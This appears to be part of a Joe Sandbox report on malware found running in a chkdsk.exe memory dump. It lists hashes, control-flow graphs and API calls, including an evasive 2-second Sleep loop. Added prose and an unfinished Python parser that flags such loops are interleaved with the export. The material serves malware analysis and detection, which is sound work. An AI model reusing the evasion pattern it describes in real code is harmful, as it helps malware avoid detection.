                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks as "id address-range [call target | API]", then edges as src->dst)
                                  • 251 d9040-d906f
                                  • 252 d907b-d9082
                                  • 253 d9076 call dbd00
                                  • 254 d915c-d9162
                                  • 255 d9088-d90d8 call dbdd0 call cace0 call d4e40
                                  • 262 d90e0-d90f1 Sleep
                                  • 263 d9156-d915a
                                  • 264 d90f3-d90f9
                                  • 265 d90fb-d9121 call d8c60
                                  • 266 d9123-d9143
                                  • 268 d9149-d914c
                                  • 269 d9144 call d8e70
                                  • edges: 251->252 251->253 252->254 252->255 253->252 255->262 262->263 262->264 263->254 263->262 264->265 264->266 265->268 266->268 266->269 268->263 269->268
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 000D90E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: efb03857d52d6573277e5425356831fb8c5fd27b1abb42dbcb8a01064d596ca9
                                  • Instruction ID: 96a1085880f92e5a4133b1ce2fb5a97274aa2e7cffd2d0ec0ba0e2ae8fe13e11
                                  • Opcode Fuzzy Hash: efb03857d52d6573277e5425356831fb8c5fd27b1abb42dbcb8a01064d596ca9
                                  • Instruction Fuzzy Hash: 2B3172B6500745BBC724DF64D885FA7B7F8BB48B00F10841EF62A5B345D670A550CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks as "id address-range [call target | API]", then edges as src->dst)
                                  • 271 d903a-d9082 call dbd00
                                  • 274 d915c-d9162
                                  • 275 d9088-d90d8 call dbdd0 call cace0 call d4e40
                                  • 282 d90e0-d90f1 Sleep
                                  • 283 d9156-d915a
                                  • 284 d90f3-d90f9
                                  • 285 d90fb-d9121 call d8c60
                                  • 286 d9123-d9143
                                  • 288 d9149-d914c
                                  • 289 d9144 call d8e70
                                  • edges: 271->274 271->275 275->282 282->283 282->284 283->274 283->282 284->285 284->286 285->288 286->288 286->289 288->283 289->288
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 000D90E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: dc74945a2ada0337e6cd2ccdab7bd8f058fa11bf438347138828b11928dedcc1
                                  • Instruction ID: 7c05aa360f6356e3ed3a6565378cfc3c256b96ef048943ffbbfec1e091583667
                                  • Opcode Fuzzy Hash: dc74945a2ada0337e6cd2ccdab7bd8f058fa11bf438347138828b11928dedcc1
                                  • Instruction Fuzzy Hash: C721A0B5600345ABCB64DF64C886FABBBF4BB48700F10802EF6296B345D674A554CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%
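The two functions above (0xD9040 and 0xD903A) are the same Sleep loop seen from two entry points: block 262 (resp. 282) calls Sleep(0x7D0) and the edge 263->262 (resp. 283->282) closes the loop, which is the "evasive loop" the report flags in its signatures. The Python below is an added worked example, not Joe Sandbox code and not part of the report: it parses the flattened control_flow_graph line and the APIs entry exactly as printed here, finds blocks that call Sleep from inside a cycle, maps the APIs "ref:" address back to its basic block, and decodes the Sleep argument (0x7D0 = 2000 ms, from the Win32 Sleep(dwMilliseconds) signature). The token layout (decimal block ids, hex addresses, "call <addr>" pairs, "a->b" edges) is inferred from the lines on this page; the sample input is copied from the report and embedded inline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input, copied from this report's function-level section:
# the flattened control_flow_graph line and the APIs entry of the Sleep loop at 0xD9040.
CFG_LINE = (
    "control_flow_graph 251 d9040-d906f 252 d907b-d9082 251->252 253 d9076 call dbd00 "
    "251->253 254 d915c-d9162 252->254 255 d9088-d90d8 call dbdd0 call cace0 call d4e40 "
    "252->255 253->252 262 d90e0-d90f1 Sleep 255->262 263 d9156-d915a 262->263 "
    "264 d90f3-d90f9 262->264 263->254 263->262 265 d90fb-d9121 call d8c60 264->265 "
    "266 d9123-d9143 264->266 268 d9149-d914c 265->268 266->268 269 d9144 call d8e70 "
    "266->269 268->263 269->268"
)
API_LINE = "Sleep.KERNELBASE(000007D0), ref: 000D90E8"


@dataclass
class Block:
    start: int                                   # first address of the basic block
    end: int                                     # last address (== start for a one-address block)
    labels: list = field(default_factory=list)   # "call <hex>" targets and bare API names


@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)   # block id -> Block
    edges: list = field(default_factory=list)    # (src id, dst id)


def parse_cfg(line: str) -> Cfg:
    """Parse the flattened CFG: '<id> <addr>[-<addr>] [call X | ApiName]... <a>-><b>...'.

    Assumption (inferred from the report's formatting): block ids are decimal, addresses
    are hex, and the token right after an id or after 'call' is always an address, so an
    all-digit address can never be mistaken for a block id.
    """
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, pending, expect_addr = Cfg(), None, None, False
    for tok in toks:
        if "->" in tok:                       # edge between two block ids
            src, dst = tok.split("->", 1)
            cfg.edges.append((int(src), int(dst)))
        elif expect_addr:
            if pending is not None:           # address range of a newly declared block
                lo, _, hi = tok.partition("-")
                cfg.blocks[pending] = Block(int(lo, 16), int(hi or lo, 16))
                cur, pending = pending, None
            else:                             # callee address following 'call'
                cfg.blocks[cur].labels.append("call " + tok)
            expect_addr = False
        elif tok.isdigit():                   # start of a block declaration
            pending, expect_addr = int(tok), True
        elif tok == "call":
            expect_addr = True
        else:                                 # bare API name attached to the block, e.g. Sleep
            cfg.blocks[cur].labels.append(tok)
    return cfg


def successors(cfg: Cfg, bid: int) -> list:
    return [d for s, d in cfg.edges if s == bid]


def in_loop(cfg: Cfg, bid: int) -> bool:
    """True when bid can reach itself, i.e. some back edge closes a loop through it."""
    seen, todo = set(), successors(cfg, bid)
    while todo:
        x = todo.pop()
        if x == bid:
            return True
        if x not in seen:
            seen.add(x)
            todo.extend(successors(cfg, x))
    return False


def blocks_calling_in_loop(cfg: Cfg, api: str) -> list:
    """Block ids that call `api` from inside a cycle: the evasive sleep-loop pattern."""
    return sorted(b for b, blk in cfg.blocks.items() if api in blk.labels and in_loop(cfg, b))


def block_for(cfg: Cfg, addr: int):
    """Block id whose address range contains addr (e.g. the APIs 'ref:' address), or None."""
    for b, blk in cfg.blocks.items():
        if blk.start <= addr <= blk.end:
            return b
    return None


API_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")


def parse_api(line: str) -> dict:
    """Parse one APIs entry such as 'Sleep.KERNELBASE(000007D0), ref: 000D90E8'."""
    m = API_RE.search(line)
    if m is None:
        raise ValueError(f"not an APIs entry: {line!r}")
    args = [a for a in m["args"].split(",") if a]
    return {"api": m["api"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)}


def sleep_ms(api: dict):
    """Sleep's only parameter is dwMilliseconds; the report prints it in hex (0x7D0 = 2000 ms)."""
    return int(api["args"][0], 16) if api["api"] == "Sleep" and api["args"] else None


if __name__ == "__main__":
    cfg = parse_cfg(CFG_LINE)
    call = parse_api(API_LINE)
    print(f"{len(cfg.blocks)} blocks, {len(cfg.edges)} edges")
    print("Sleep called inside a loop at block(s):", blocks_calling_in_loop(cfg, "Sleep"))
    print("ref 0x%X lies in block %s; delay %d ms"
          % (call["ref"], block_for(cfg, call["ref"]), sleep_ms(call)))
```

Run against the two Sleep functions above it reports block 262 (resp. 282) as a Sleep call inside a cycle and a 2000 ms delay per iteration; the same `blocks_calling_in_loop` check with "RtlAllocateHeap" or "PostThreadMessageW" on the later CFGs returns nothing, since those functions are straight-line code.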

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 da5f0-da621 call daf20 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&E,?,000D4C9F,000D4C9F,?,000D4526,?,?,?,?,?,00000000,00000000,?), ref: 000DA61D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &E
                                  • API String ID: 1279760036-809379005
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: da22c280ce080b69c616058010e085087ab267f391ff398020945c26d950f037
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: D3E012B2200208ABDB14EF99DC41EA777ACEF88654F118599BA089B242C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 300 da623-da647 call daf20 302 da64c-da661 RtlFreeHeap 300->302
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: b44c1acee337ea0c686e99c1270b2a65a8297b02c87cd28efe42a10116497b9e
                                  • Instruction ID: d626d3040b71baf946f899b6ec9bead0253b74d683594578d16b89413c72997d
                                  • Opcode Fuzzy Hash: b44c1acee337ea0c686e99c1270b2a65a8297b02c87cd28efe42a10116497b9e
                                  • Instruction Fuzzy Hash: 2CE06FB81042800BDB00EF78D8C089B37A4EF82308B10998AF8A987303C230C81ACBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks as "id address-range [call target | API]", then edges as src->dst)
                                  • 303 da630-da646
                                  • 304 da64c-da661 RtlFreeHeap
                                  • 305 da647 call daf20
                                  • edges: 303->304 303->305 305->304
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 1c5a6473494bb627cd2705a7199ec21133c7db2ae3c6381b5ebd991af2a36198
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: ABE01AB12002046BD714DF99DC45EA777ACEF88750F014555B90857242C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks as "id address-range [call target | API]", then edges as src->dst)
                                  • 312 c830c-c835a call dbe20 call dc9c0 call cace0 call d4e40
                                  • 321 c835c-c836e PostThreadMessageW
                                  • 322 c838e-c8392
                                  • 323 c838d
                                  • 324 c8370-c838b call ca470 PostThreadMessageW
                                  • edges: 312->321 312->322 321->323 321->324 323->322 324->323
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 961365c1e64dfb5fa91f7f1b3c265d0f799480bc51a9c080a2ef6ac3d4a35235
                                  • Instruction ID: f8f4ebf41a6176ae3d6892f3457a3994619cc7569558197fe05f2b205443df2c
                                  • Opcode Fuzzy Hash: 961365c1e64dfb5fa91f7f1b3c265d0f799480bc51a9c080a2ef6ac3d4a35235
                                  • Instruction Fuzzy Hash: 8001A231A8032877E721A7949C43FFE776C6B41F51F05411AFF04BA2C2EAA46A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks and edges recovered from the graph image)
                                  • 327: c8310-c831f
                                  • 328: c8328-c835a, call dc9c0, call cace0, call d4e40
                                  • 329: c8323, call dbe20
                                  • 336: c835c-c836e, PostThreadMessageW
                                  • 337: c838e-c8392
                                  • 338: c838d
                                  • 339: c8370-c838b, call ca470, PostThreadMessageW
                                  • Edges: 327->328, 327->329, 328->336, 328->337, 329->328, 336->338, 336->339, 338->337, 339->338
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                  • Instruction ID: b3a93c5c4a9917670513c2a8e18c0f02d206f5db2d28062789c38ee8da622790
                                  • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                  • Instruction Fuzzy Hash: 1501A231A8032877E721A7949C43FFE776C6B41F51F054119FF04BA2C2EAA46A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%
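
                                  The two control_flow_graph entries above (the functions at 0xc830c and 0xc8310 in the chkdsk.exe dump) are exported by the report as the text nodes of the graph SVG run together on one line. The following is an added example, not Joe Sandbox code, that parses that one-line export back into basic blocks and edges and then answers the question an analyst actually has here: which blocks reach PostThreadMessageW, and along which paths. The CFG_TEXT string is copied verbatim from the second entry; the Block/Cfg names and the parsing rule (a decimal token followed by a hex address or address range opens a new block, "call xxxxx" pairs are internal call targets, anything else in a label is a resolved API name) are assumptions derived from the two entries on this page.

```python
"""Added example: parse the flattened control_flow_graph text that a Joe Sandbox
report exports (the text nodes of the graph SVG, run together on one line) back
into basic blocks and edges, then answer simple reachability questions."""
import re
from dataclasses import dataclass, field

# Copied from the report above: the graph of the function at 0xc8310 in the
# chkdsk.exe memory dump (hcaresult_10_2_c0000_chkdsk).
CFG_TEXT = (
    "control_flow_graph 327 c8310-c831f 328 c8328-c835a call dc9c0 call cace0 "
    "call d4e40 327->328 329 c8323 call dbe20 327->329 336 c835c-c836e "
    "PostThreadMessageW 328->336 337 c838e-c8392 328->337 329->328 338 c838d "
    "336->338 339 c8370-c838b call ca470 PostThreadMessageW 336->339 338->337 "
    "339->338"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_NODE_ID = re.compile(r"^\d+$")
# A block label starts with a hex address or an address range "lo-hi" (assumed format).
_ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    node: int                                   # graph node id as printed in the report
    start: int                                  # first instruction address
    end: int                                    # last instruction address (== start for a single address)
    calls: list = field(default_factory=list)   # targets of "call xxxxx" inside the block
    apis: list = field(default_factory=list)    # resolved API names the block invokes


@dataclass
class Cfg:
    blocks: dict                                # node id -> Block
    edges: list                                 # (src node, dst node) in report order


def parse_cfg(text: str) -> Cfg:
    """Rebuild blocks and edges from the one-line text export of the graph."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a Joe Sandbox control_flow_graph export")
    blocks, edges = {}, []
    cur = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif _NODE_ID.match(tok) and i + 1 < len(tokens) and _ADDR.match(tokens[i + 1]):
            # Decimal node id followed by its address (range): a new block begins.
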